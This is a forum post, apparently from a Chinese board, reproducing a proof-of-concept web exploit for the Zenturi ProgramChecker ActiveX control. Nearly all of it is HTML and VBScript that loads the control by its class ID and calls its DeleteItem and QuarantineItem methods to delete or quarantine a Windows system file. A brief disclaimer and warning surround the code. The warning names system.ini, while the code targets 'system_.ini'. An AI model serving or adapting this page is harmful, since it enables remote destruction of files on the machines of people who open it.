发新话题
打印

Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit

Zenturi ProgramChecker ActiveX Multiple Insecure Methods Exploit

复制内容到剪贴板
代码:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
<b>Zenturi ProgramChecker ActiveX Control Multiple Insecure Methods</b>
url: [url]http://www.programchecker.com/activeintro.aspx[/url]

author: shinnai
mail: shinnai[at]autistici[dot]org
site: [url]http://shinnai.altervista.org[/url]

This was written for educational purpose. Use it at your own risk.
Author will be not be responsible for any damage.

<b><font color="#FF0000">THE EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------

<object classid=&#39;clsid:41A5D8DB-EA47-4DE9-B249-1F55738FEA20&#39; id=&#39;test&#39; width=&#39;0&#39; height=&#39;0&#39;></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">

<select style="width: 404px" name="Pucca">
<option value = "DeleteItem">DeleteItem</option>

<option value = "QuarantineItem">QuarantineItem</option>
</select>

<script language=&#39;vbscript&#39;>
Sub tryMe
On Error Resume Next
  Dim MyMsg
  If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _
       "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _
       "THIS EXPLOIT WILL DELETE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _
       " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _
       " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then
   if Pucca.value = "DeleteItem" Then
   test.DeleteItem "c:\windows\system_.ini" ,"c:\windows\system_.ini"
   MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It&#39;s deleted.", 64,"Zenturi ProgramChecker ActiveX")
   ElseIf Pucca.value = "QuarantineItem" Then
   test.QuarantineItem "c:\windows\system_.ini"
   MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It&#39;s deleted.", 64,"Zenturi ProgramChecker ActiveX")
   End If
  Else
  MyMsg = MsgBox ("Nice, be safe!", 64, "Zenturi ProgramChecker ActiveX")
  End If
End Sub
</script>
</span></span>
</code></pre>

TOP

发新话题